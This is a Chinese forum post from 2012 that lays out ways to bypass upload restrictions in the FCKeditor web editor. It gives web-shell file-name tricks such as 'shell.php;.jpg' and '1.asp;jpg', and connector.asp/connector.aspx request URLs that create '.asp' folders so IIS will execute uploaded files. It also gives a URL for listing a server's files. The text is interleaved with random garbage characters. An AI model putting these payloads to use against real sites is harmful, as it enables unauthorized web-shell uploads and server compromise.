很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
% @% H$ Q$ ~9 h
2 p% d4 k6 Z8 c: \提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。% g+ Q3 p @* B& @2 q+ `2 P
* }% L# y1 r/ B继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
" L9 H& K6 f3 b3 N+ c9 |7 s/ {! j3 k
突破建立文件夹:
1 h9 Q$ k2 P" x+ ~* d
e A7 h' U6 P+ e) s% `editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
0 m8 ~5 W, V! \- Y8 @- s m L& O) I6 w) z0 v7 S
参数:
& J3 j5 j& e4 K
, ~' p: w( O6 C' J- w2 T5 z当前目录名:CurrentFolder=/qing.asp
& p$ ]7 u. m. L8 b' _; A- b1 B& V
5 P% m4 j. c( ]! k% K/ M新的目录名:NewFolderName=x.asp
* o' [' Y4 X$ }& p1 ?+ r1 }$ A6 K2 E8 D8 {# P1 B6 ]& r
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……; t/ a& U0 J/ {: X
) Y. O, y: Z1 p: r3 |- J那么 x.asp 就已经建立生成了,此方法百试百灵!
# M, |. @; e" K0 \* P
; R3 Y. C; j( D5 ~* V; E( z新建文件夹参数 x.asp,基本都能搞定。9 m, j" Z4 ]6 ~1 v" n: t
) M) d2 n" ]( u+ S下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
! f* S _* M4 |
& ?+ o3 O# S" e. Naspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp2 R/ e0 r: a) F1 N* I- A+ D- ~8 R
4 J8 A% F# q: p3 c' {1 `" X/ m获取文件列表
( A( ~- i) P7 w; P1 n h" J aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
9 W+ k$ r5 Q3 @! x
% ~: y# j) b0 m9 m* m2 R |
发表于 2012-12-31 09:27:09
收藏
分享
支持
反对